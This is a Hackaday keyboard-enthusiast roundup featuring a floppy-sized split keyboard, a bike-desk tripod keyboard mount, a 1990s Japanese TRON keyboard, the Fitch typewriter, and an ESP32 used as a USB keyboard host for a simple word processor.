[Folaefolc] was craving a new keyboard build a few weeks ago and got inspired by the humble 3.5″ floppy disk. So much so that he decided to make a split keyboard with each half having the exact footprint of a floppy — 90 mm x 94 mm. And you know the PCBs have floppy details silkscreened on the back. Just check out the gallery.

Image via [Folaefolc] via redditThis bad boy uses a pair of Liatris microcontrollers, which are made by splitkb and are designed to be drop-in replacements for Pro Micros and an alternative to the RP2040.

The other fun part of this build is that [Folaefolc] used RJ9 connectors to join the halves instead of something like TRRS.

Beneath those candy keycaps are 34 Kailh choc v1 switches shoved into hot swap sockets in case [Folaefolc] changes his mind. Gerbers are available if you want to build one of these cuties!

Via reddit

A Bicycle Built for Two Hands

[Lachlan Kermode] got so heavy into cycling last summer that he figured out the best possible way to do so while getting work done. Now, if only he could get some fresh air as well.

Image by [Lachlan Kermode] via OHRGPhase Zero involved simply sliding the stationary bike under the standing desk, but that didn’t really work for keyboarding. Once someone noted that [Lachlan]’s keyboard is from the ZSA family and pointed him toward the tripod mount, he was on the right track.

This mount is basically just a couple of magnets that attach to the keyboard halves and let you mount them to a standard tripod screw. A couple of camera clamps later, and Bob became [Lachlan]’s proverbial uncle.

Having used it for a while now, [Lachlan] found the most comfort with the halves pointed downward at a 45° angle, which allows him to rest his palms on the handlebars and type fairly comfortably. It’s going to take some experimentation to get it perfect, but he seems to be most of the way there.

The Centerfold: This 90s Japanese TRON Keyboard

Image via reddit
No, not TRON (1982). This keyboard refers to the Japanese operating system and Unicode alternative, where TRON stands for The Real-time Operating system Nucleus. I’m not sure how many fingers you’re supposed to have to use this thing, which looks at once both ergonomic and wildly not, what with those faraway pinkie keys. Hey, at least it’s Dvorak? See also Xah Lee’s page and this video for more about these keyboards.

youtube.com/embed/DdleC5v5O0M?…

Do you rock a sweet set of peripherals on a screamin’ desk pad? Send me a picture along with your handle and all the gory details, and you could be featured here!

Historical Clackers: The Fitch (American)

Image via The Antikey Chop
Yes there are British Fitches as well, and they were slightly different than the American Fitch. I’m guessing that both models bore that wild rear-downstrike typebar arrangement which both distinguished it and doomed it to failure. Be sure to check out the other pictures on the Antikey Chop site, including the really strange layout.

The Fitch could type 78 characters with its 26-key, double-shift keyboard. The 1u Space is of particular interest. Ink was transferred via roller, and the earliest specimens had a pair of reservoirs behind the carriage for spare rollers.

Though this machine looks heavy (at least to me), the Fitch weighed only 11 pounds and took up a cubic foot of space. It was never advertised as a portable, though the Antikey Chopkeep theorizes that they could have been. These Fitches were evidently quite well-built little machines, which makes their lightness that much more intriguing.

ICYMI: ESP32 Hosts Keyboard

Image via YouTube
You’re likely aware of the USB device mode of an ESP32. But did you know that they can act as HID hosts, too? That’s Human Interface Devices — keyboards, mice, trackballs, and the like.

For this project, [Volos] used the EspUsbHost Arduino library, which makes USB host mode a relatively simple thing to use. Tantamount to success here is the LCD board: it has a dual-role USB-C port, so the hardware required to switch roles is right there.

On the software side, [Volos] created a simple word processing program that saves and loads files from a microSD card, using a four-bit palette to save on memory.

Got a hot tip that has like, anything to do with keyboards? Help me out by sending in a link or two. Don’t want all the Hackaday scribes to see it? Feel free to email me directly.

hackaday.com/2024/11/25/keebin…